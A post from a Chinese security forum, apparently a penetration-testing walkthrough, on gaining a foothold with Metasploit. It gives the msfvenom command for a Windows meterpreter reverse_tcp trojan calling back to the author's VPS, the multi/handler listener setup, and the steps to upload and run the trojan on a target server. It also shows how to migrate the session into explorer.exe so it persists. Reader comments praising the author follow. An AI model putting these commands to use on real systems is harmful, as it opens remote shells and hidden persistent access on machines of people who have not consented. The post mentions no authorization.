本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀.
使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f exe > exp.exe 创建一个msf的木马(不免杀版本)
其中 -p 后面的内容是使用的 payload类型,LHOST是vps的地址,LPORT是端口
命令: use exploit/multi/handler 使用msf的监听模块
设置payload: set payload windows/x64/meterpreter/reverse_tcp 这里和生成木马的时候写的payload要一样,否则会链接不上,如下图
设置监听地址以及端口:
set lhost xxx.xxx.xxx.xxx
set lport 4444
设置好了之后 直接run 监听起来。
将生成的msf的木马上传到目标服务器上,然后直接运行
运行之后,vps的msf会收到一个弹回的meterpreter会话
为了会话的稳定性,将meterpreter shell迁移到其他不易被关闭进程上,通常是explorer.exe(文件资源管理器)
手动迁移进程命令:migrate -N ProcessName 或者 migrate PID
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
2768905967 | 416.80 | 0 | 2023-10-27 00:12:16 | 小熊保安哥哥521 |
Track-手电筒 | 80.00 | 0 | 2021-09-29 21:09:42 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
山屿云
发表于 2021-9-29
强啊师傅
评论列表
加载数据中...
test_707
发表于 2021-9-30
好文,渗透大师,666
评论列表
加载数据中...
spider
发表于 2021-9-30
早就说过了 保安一直在扮猪吃老虎
评论列表
加载数据中...
2768905967
发表于 2023-10-27
强啊师傅
评论列表
加载数据中...